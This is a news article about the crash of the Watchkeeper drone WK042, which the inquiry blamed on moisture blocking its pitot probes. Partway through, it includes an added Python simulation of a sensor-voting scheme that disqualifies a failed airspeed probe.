“From its detailed analysis,” wrote Air Marshal Gray in her formal comments on the Service Inquiry (SI) report, “the SI concluded that the design of [Watchkeeper’s] air data system limited its ability to fly safely in cloud and precipitation.” A buildup of moisture in the Watchkeeper’s pitot probes was found to have caused its automated flight logic to start doing crazy things – ultimately leading to a stall and a crash.

Ice, ice, baby

After taking off uneventfully from Aberporth on the scheduled icing detection trial flight, WK042 climbed first to 3,000ft in the hope of finding icing conditions, gradually stepping up to 8,800ft. It then “experienced high wind that was momentarily on the allowable limits”, prompting its operators to command a descent and return to base.

Watchkeeper is not flown like a conventional aeroplane with a human sitting at a stick and rudder. Its operators select waypoints on a screen for the drone to fly itself towards. During flight, its onboard logic decides precisely how the drone arrives at those waypoints, within constraints selected by human operators. Watchkeeper’s predecessor, the Hermes 450, could be flown manually but this design feature was not included on the British Army’s craft.

Twenty minutes later, a spate of warnings began to be displayed to the operators as their controls relayed the drone’s violent oscillations. Fifteen minutes after that, contact with the Watchkeeper was lost. In that last quarter of an hour, the drone “pitched up and down repeatedly between 3,200ft and 3,500ft” until it “descended rapidly into the sea” about two miles northwest of the hamlet of Llangrannog, which itself is four or five miles northeast of Aberporth Airfield.

Among the warnings displayed to its operators during the pitching incidents were “estimated AOA in use” and “flight envelope protection active”, indicating that the Watchkeeper was no longer trusting its sensors. Thales’ own investigators concluded that the left tail fin had been damaged or possibly even been torn from the airframe by the violent manoeuvres, “causing a catastrophic loss of control”, though the MoD inquiry downgraded this to saying it was a contributory factor but not the critical one.
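The inquiry's point about algorithms that "identify and disqualify single sensor failure" is easier to see with a small simulation. This is an added example, not Thales's or the Watchkeeper's flight logic: it runs constructed airspeed telemetry from three redundant probes, one of which freezes as a blocked pitot probe would, through a plain average and through a voter that disqualifies stuck or disagreeing probes and flags that estimated air data is now in use. The thresholds are hypothetical.

```python
from statistics import median

# Constructed telemetry (not Watchkeeper data): three redundant airspeed
# readings in knots per sample. Probe 2 blocks at sample 2 and freezes on its
# last value while the aircraft actually decelerates.
SAMPLES = [
    (120.0, 121.0, 119.5),
    (118.0, 118.5, 117.5),
    (116.0, 116.5, 117.5),  # probe 2 blocked from here: frozen at 117.5
    (112.0, 112.5, 117.5),
    (108.0, 108.5, 117.5),
    (104.0, 104.5, 117.5),
]

# Hypothetical thresholds; a real air data system would tune these per sensor.
DISAGREE_KNOTS = 5.0   # further than this from the other probes' median -> suspect
STUCK_SAMPLES = 3      # unchanged for this many consecutive samples -> suspect


def naive_airspeed(readings):
    """Plain average: one blocked probe pulls the result away from the truth."""
    return sum(readings) / len(readings)


def run_air_data(samples):
    """Disqualify failed probes, then vote among the rest.

    Returns (airspeed per sample, set of disqualified probe indexes, events).
    Airspeed is None when fewer than two trusted probes remain; any event
    corresponds to an "estimated air data in use" style warning to the crew.
    """
    history = [[] for _ in samples[0]]
    disq, events, airspeed = set(), [], []
    for n, readings in enumerate(samples):
        for i, r in enumerate(readings):
            history[i].append(r)
        # Pass 1: a frozen reading is the signature of a blocked pitot probe.
        for i in range(len(readings)):
            recent = history[i][-STUCK_SAMPLES:]
            if i not in disq and len(recent) == STUCK_SAMPLES and len(set(recent)) == 1:
                disq.add(i)
                events.append((n, i, "stuck"))
        # Pass 2: a probe far from the median of the other trusted probes.
        for i, r in enumerate(readings):
            others = [x for j, x in enumerate(readings) if j != i and j not in disq]
            if i not in disq and len(others) >= 2 and abs(r - median(others)) > DISAGREE_KNOTS:
                disq.add(i)
                events.append((n, i, "disagree"))
        trusted = [r for i, r in enumerate(readings) if i not in disq]
        airspeed.append(median(trusted) if len(trusted) >= 2 else None)
    return airspeed, disq, events
```

With only two probes left after a disqualification the voter can no longer tell which of them is wrong, which is why it stops arbitrating and why a second failure would leave the system with estimated data only.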

A seabed search using remote underwater vehicles failed to turn up any of the Watchkeeper wreckage, though RAF personnel later found one of its composite panels washed up on a beach. That was the sum of wreckage found by investigators – all the analysis was done from data transmitted by the UAV back to its ground station. There is no “black box” on a Watchkeeper.

The SI report into WK042 is here.

The MoD has 50 Watchkeepers remaining on charge. Another report into WK050 – the 2018 crash on land near Aberporth village – is expected soon, while The Register will be separately reporting about the crash of WK043, which also had an unscheduled surface/aircraft interaction event a month after the drone featured in this article. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/15/watchkeeper_drone_crash_wk042_moisture_blocked_pitot/